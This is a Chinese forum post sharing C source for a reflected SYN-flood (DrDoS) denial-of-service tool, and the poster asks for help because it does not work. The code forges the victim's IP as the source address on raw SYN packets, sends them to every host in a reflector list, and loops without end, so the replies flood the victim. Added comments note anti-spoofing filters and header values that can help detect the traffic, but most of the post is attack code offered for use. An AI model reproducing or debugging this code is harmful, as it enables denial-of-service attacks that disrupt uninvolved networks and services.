根据TOMYCHEN提供的synflood改的DrDoS。郁闷,测试不成功。哪位精通TCP老兄给指点指点
代码:
//FileName:DRDos.c //Author:Unknow //Modify:Tomy.Chen //last modify:SysHu0teR //LastTime:2004-11-28 12:57 //Description: //Synflood DoS attack,and this version support and win32 //compile with linux need the "pthread" lib //compiled on vc++ 6.0 and gcc 3.2.2 #include<stdio.h> #ifdef WIN32 #include <winsock2.h> #include <Ws2tcpip.h> #include <windows.h> #include <stdio.h> #pragma comment(lib,"ws2_32") #pragma comment(lib,"wsock32")
#else
#include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <pthread.h> #include <errno.h>
#endif
#ifndef WIN32 #define USHORT unsigned short #define SOCKET int #define DWORD unsigned long #define UCHAR unsigned char #define HANDLE int #define INVALID_SOCKET (SOCKET)(~0) #define SOCKET_ERROR (-1) #define GetLastError() errno #define WSAGetLastError() errno #endif
#define bool int #define true 1 #define false 0 // #define SERVER_IP "61.129.81.210" //这是上面我所说的所谓的大量节点 更改 #define SEQ 0x28376839 #define LOG "===============Begin====================\n" USHORT checksum(USHORT *buffer, int size); int flood();
// TCP header layout used as the template for every packet this program builds.
// Multi-byte fields are stored in network byte order by the code that fills them.
typedef struct tcphdr
{
    USHORT th_sport;            // source port (main() sets it from argv[2])
    USHORT th_dport;            // destination port (main() sets it to 80)
    unsigned int th_seq;        // sequence number (SEQ + SendSEQ)
    unsigned int th_ack;        // acknowledgement number (main() sets it to 0)
    unsigned char th_lenres;    // header length in the upper nibble, reserved bits below
    unsigned char th_flag;      // TCP flag bits (main() writes 2, i.e. SYN only)
    USHORT th_win;              // advertised window
    USHORT th_sum;              // TCP checksum, filled in by flood()
    USHORT th_urp;              // urgent pointer (main() sets it to 0)
}TCP_HEADER;
// IPv4 header layout (no options) that is written in front of the TCP header
// because the socket is opened with IP_HDRINCL.
typedef struct iphdr
{
    unsigned char h_verlen;         // version in the upper nibble, header length in the lower
    unsigned char tos;              // type of service (never assigned in this file)
    unsigned short total_len;       // total datagram length, network byte order
    unsigned short ident;           // identification field (main() sets it to 1)
    unsigned short frag_and_flags;  // fragment flags and offset (main() sets it to 0)
    unsigned char ttl;              // time to live (main() sets it to 128)
    unsigned char proto;            // payload protocol (IPPROTO_TCP)
    unsigned short checksum;        // header checksum, filled in by flood()
    unsigned int sourceIP;          // source address as returned by inet_addr()
    unsigned int destIP;            // destination address as returned by inet_addr()
}IP_HEADER;
// Pseudo-header object (an unnamed struct type with one instance, PSD_HEADER).
// flood() copies it in front of the TCP header before calling checksum().
struct
{
    unsigned long saddr;    // source address, copied from ipheader.sourceIP
    unsigned long daddr;    // destination address, copied from ipheader.destIP
    char mbz;               // set to 0 by main()
    char ptcl;              // protocol number (IPPROTO_TCP)
    unsigned short tcpl;    // TCP length, htons(sizeof(tcpheader))
}PSD_HEADER;
// File-scope state shared by main() and flood(): the raw socket (sockMain), the
// last error code, the IP and TCP header templates, the destination sockaddr and
// the 128-byte buffer in which each packet is assembled.
#ifdef WIN32 WSADATA wsaData; #endif SOCKET sockMain; int ErrorCode=0,flag=true,TimeOut=2000,ServerIpNet,ServerIpHost,dataSize=0,SendSEQ=0; //changed int portNum=0; unsigned short activPort=40000; struct sockaddr_in sockAddr; TCP_HEADER tcpheader; IP_HEADER ipheader; char sendBuf[128];
// 16-bit one's-complement checksum over `size` bytes starting at `buffer`.
// Whole 16-bit words are summed first; a trailing odd byte, if any, is added
// as-is. The carries are then folded back into the low 16 bits twice and the
// complement of the result is returned.
USHORT checksum(USHORT *buffer, int size)
{
    unsigned long acc = 0;
    const USHORT *word = buffer;
    int remaining = size;

    // Sum every complete 16-bit word.
    for (; remaining > 1; remaining -= sizeof(USHORT)) {
        acc += *word++;
    }

    // Add the single left-over byte when the length is not a multiple of two.
    if (remaining != 0) {
        acc += *(const UCHAR *)word;
    }

    // Fold the carry bits back in; the second fold absorbs a carry
    // produced by the first.
    acc = (acc & 0xffff) + (acc >> 16);
    acc += acc >> 16;

    return (USHORT)(~acc);
}
// main: sets up a raw socket, fills the IP/TCP header templates from the command
// line, starts flood() on its own thread and waits for a key press.
//
// Returns 1 on a bad argument count, 2 when WSAStartup fails, 3 when the socket
// cannot be created, 4 when IP_HDRINCL cannot be set, 5 when the WIN32 send
// timeout cannot be set, and 0 after the stop path.
//
// Defensive context: every packet built from these templates is a bare SYN whose
// IP source field is taken from argv[1] rather than from the sending host.
// Networks that enforce source-address validation (BCP 38 / uRPF) do not forward
// packets like that. Several header fields are constants (ident 1, TTL 128 at
// origin, window 65534, destination port 80, sequence numbers counting up from
// 0x28376839), so they can serve as match criteria when looking for this traffic
// in packet captures.
int main(int argc,char* argv[]) { #ifndef WIN32 pthread_attr_t attr; pthread_t tid; #endif
DWORD dw; HANDLE hThread=0; char putInfo;
// Argument check and usage text, Winsock start-up (WIN32 only), then a
// SOCK_RAW/IPPROTO_RAW socket with IP_HDRINCL so the IP header built below is
// sent as supplied. argv[2] is parsed with atoi() into portNum.
if(argc!=3) { printf("%s\n",LOG); printf("Invalid command,Pls use:\n%s <IP> <port> <iplist_file>\nExample:%s 192.168.100.244 80 ip.txt\n",argv[0],argv[0]); return 1; } #ifdef WIN32 if((ErrorCode=WSAStartup(MAKEWORD(2,1),&wsaData))!=0){ printf("WSAStartup failed: %d\n",ErrorCode); return 2; } #endif sockMain=socket(PF_INET,SOCK_RAW,IPPROTO_RAW); if(sockMain==INVALID_SOCKET) { printf("Socket failed: %d\n",WSAGetLastError()); return 3; } ErrorCode=setsockopt(sockMain,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(int)); if(ErrorCode==SOCKET_ERROR) { printf("Set sockopt failed: %d\n",WSAGetLastError()); return 4; } #ifdef WIN32 ErrorCode=setsockopt(sockMain,SOL_SOCKET,SO_SNDTIMEO,(char*)&TimeOut,sizeof(TimeOut)); if(ErrorCode==SOCKET_ERROR) { printf("Set sockopt time out failed: %d\n",WSAGetLastError()); return 5; } #endif portNum=atoi(argv[2]); //which port of the attacked IP?
// Disabled code from the single-target version (fixed SERVER_IP).
// memset(&sockAddr,0,sizeof(sockAddr)); // sockAddr.sin_family=AF_INET; // sockAddr.sin_addr.s_addr =inet_addr(SERVER_IP); // ServerIpNet=inet_addr(SERVER_IP); //changed // ServerIpHost=ntohl(ServerIpNet); //changed
// IP header template. Both address fields are filled from argv[1] here;
// flood() overwrites destIP for every entry it reads from the list file.
ipheader.h_verlen=(4<<4 | sizeof(IP_HEADER)/sizeof(unsigned long)); ipheader.total_len = htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER)); ipheader.ident = 1; ipheader.frag_and_flags = 0; ipheader.ttl = 128; ipheader.proto = IPPROTO_TCP; ipheader.checksum =0; ipheader.sourceIP = inet_addr(argv[1]); //the source address here is the address being attacked ipheader.destIP = inet_addr(argv[1]); //in theory, the destination address is the network node
// TCP header template: flag byte 2 is SYN with no other flag set.
tcpheader.th_dport=htons(80); //send the packet to port 80 of the network node, tcpheader.th_sport = htons(portNum); tcpheader.th_seq = htonl(SEQ+SendSEQ); tcpheader.th_ack = 0; tcpheader.th_lenres =(sizeof(TCP_HEADER)/4<<4|0); tcpheader.th_flag = 2; tcpheader.th_win = htons(65534);//16384); tcpheader.th_urp = 0; tcpheader.th_sum = 0;
// Pseudo-header fields for the TCP checksum, then flood() is started as a
// separate thread (CreateThread on WIN32, pthread_create otherwise).
//the pseudo-header follows PSD_HEADER.saddr=ipheader.sourceIP; PSD_HEADER.daddr=ipheader.destIP; PSD_HEADER.mbz=0; PSD_HEADER.ptcl=IPPROTO_TCP; PSD_HEADER.tcpl=htons(sizeof(tcpheader)); printf("%s\n",LOG); #ifdef WIN32 hThread=CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)flood,0,CREATE_SUSPENDED,&dw); SetThreadPriority(hThread,THREAD_PRIORITY_HIGHEST); ResumeThread(hThread); #else pthread_attr_init(&attr); pthread_attr_setscope(&attr, PTHREAD_SCOPE_SYSTEM); hThread = pthread_create(&tid,NULL,(void*)flood,NULL); #endif
// Blocks on getchar(); after input arrives the WIN32 build terminates the
// thread and calls WSACleanup(), the other build calls pthread_exit().
printf("Warning[start]...........\nPress any key to stop!\n"); putInfo=getchar(); #ifdef WIN32 TerminateThread(hThread,0); WSACleanup(); #else pthread_exit((void*)hThread); #endif
printf("\nStopd...........\n");
return 0; }
// flood: thread routine started by main(). It reads addresses from the list file
// and sends one packet built from the global header templates to each of them.
//
// The outer loop reopens the list file on every pass. The inner loop reads one
// whitespace-delimited token into serverip, advances SendSEQ (reset to 1 after it
// reaches 65536), points sockAddr and ipheader.destIP at that address, refreshes
// both checksum fields and hands the assembled buffer to sendto() on sockMain.
// After each pass, if the last sendto() returned SOCKET_ERROR, a message is
// printed and the thread exits with status 1.
//
// Defensive context: the hosts named in the list file receive SYNs to port 80
// whose source field is the address given to main(), so their SYN-ACK replies go
// to that address. At that address the traffic shows up as SYN-ACKs from port 80
// of many hosts for connections it never opened.
int flood() { FILE *list; char serverip[20];
while(1) { list=fopen("d:\ip.txt","r"); while(!feof(list)) { fscanf(list,"%s",serverip);
// Per-destination update; the TCP checksum is computed over the pseudo-header
// followed by the TCP header, both staged in sendBuf.
if(SendSEQ++==65536) SendSEQ=1; //if(activPort++==40010) activPort=1000; memset(&sockAddr,0,sizeof(sockAddr)); sockAddr.sin_family=AF_INET; sockAddr.sin_addr.s_addr =inet_addr(serverip); ipheader.checksum =0; ipheader.destIP = inet_addr(serverip); //switch to the next network node IP tcpheader.th_seq = htonl(SEQ+SendSEQ); //tcpheader.th_sport = htons(activPort); tcpheader.th_sum = 0; PSD_HEADER.daddr=ipheader.destIP; //same as above memcpy(sendBuf,&PSD_HEADER,sizeof(PSD_HEADER)); memcpy(sendBuf+sizeof(PSD_HEADER),&tcpheader,sizeof(tcpheader)); tcpheader.th_sum=checksum((USHORT *)sendBuf,sizeof(PSD_HEADER)+sizeof(tcpheader));
// sendBuf is then reused for the packet itself: IP header, TCP header, four
// zero bytes; the IP checksum field is filled in and the buffer is sent.
memcpy(sendBuf,&ipheader,sizeof(ipheader)); memcpy(sendBuf+sizeof(ipheader),&tcpheader,sizeof(tcpheader)); memset(sendBuf+sizeof(ipheader)+sizeof(tcpheader),0,4); dataSize=sizeof(ipheader)+sizeof(tcpheader); ipheader.checksum=checksum((USHORT *)sendBuf,dataSize); memcpy(sendBuf,&ipheader,sizeof(ipheader)); ErrorCode=sendto(sockMain,sendBuf,dataSize,0,(struct sockaddr*) &sockAddr,sizeof(sockAddr)); Sleep(1); } fclose(list); if(ErrorCode==SOCKET_ERROR) { printf("\nCan't connect this IP!Pls check it.\n"); #ifdef WIN32 ExitThread(1); #else pthread_exit((void*)1); #endif } // Sleep(1000); } return 0; }